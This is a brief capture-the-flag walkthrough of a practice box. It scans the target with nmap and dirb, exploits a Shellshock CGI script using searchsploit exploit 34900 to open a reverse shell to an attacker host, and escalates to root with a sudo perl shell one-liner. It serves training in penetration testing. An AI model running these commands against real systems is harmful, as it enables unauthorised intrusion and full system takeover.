[Reconnaissance]
- Port scan
nmap -Pn <ip>
2. Scan for everything
nmap -A -p 80,2222 <ip>
3. Vulnerability scan
nmap --script vuln -p 80,2222 <ip>
4. Try to login with ssh.
ssh <ip> -p 2222
5. Directory fuzzing
dirb http://<ip>
6. Scan /cgi-bin/
dirb http://<ip>/cgi-bin/ -X. sh
Found something, this could mean shellshock.
[Exploitation]
- Search for exploits
searchsploit shellshock cgi
2. Copy script no.34900
searchsploit -m 34900
3. Read the script for usage
4. Run the script
python 34900.py payload=reverse rhost=<target ip> lhost=<attacker ip> lport=1235 pages=/cgi-bin/user.sh
Success!!!
5. Verify user
whoami
Seems like I have shelly’s privilege
6. read user.txt
cd /home/shellycat user.txt
7. Privilege escalation
Verify sudo privileges
sudo -l
I can “sudo perl”.
Use command from this site: https://gtfobins.github.io/gtfobins/perl/#sudo
sudo perl -e 'exec "/bin/sh";'whoami
Now I’m root.
8. Read root.txt
cd /rootcat root.txt